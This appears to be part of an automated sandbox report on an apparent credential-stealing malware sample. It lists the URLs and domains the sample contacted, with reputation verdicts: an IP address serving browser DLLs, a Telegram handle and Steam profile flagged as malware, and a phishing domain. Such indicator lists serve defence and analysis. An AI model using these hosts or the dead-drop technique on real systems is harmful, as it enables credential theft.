                  https://95.217.240.101/msvcp140.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis0%Avira URL Cloudsafe
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                  https://steamcommunity.co100%Avira URL Cloudphishing
                  https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA0%Avira URL Cloudsafe
                  https://t.me/k0mono100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/badges100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/inventory/100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                  https://95.217.240.101/mozglue.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/softokn3.dllK100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am0%Avira URL Cloudsafe
                  https://95.217.240.101/sqlx.dll100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322100%Avira URL Cloudmalware
                  https://95.217.240.101/v100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		23.194.234.100
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://95.217.240.101/nss3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/softokn3.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/msvcp140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/mozglue.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/sqlx.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=JEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/nss3.dll2RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&ampRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiIIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://mozilla.org0/nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101KJERegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968652432276561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/loginRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=JEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGCBFBG.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101FIERegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_qRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFGCBFBG.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllURegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dllsRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.10176561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.coRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmptrue
                    • Sophos S4: illegal phishing domain
                    • Avira URL Cloud: phishing
                    		unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGARegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/softokn3.dllKRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/vRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
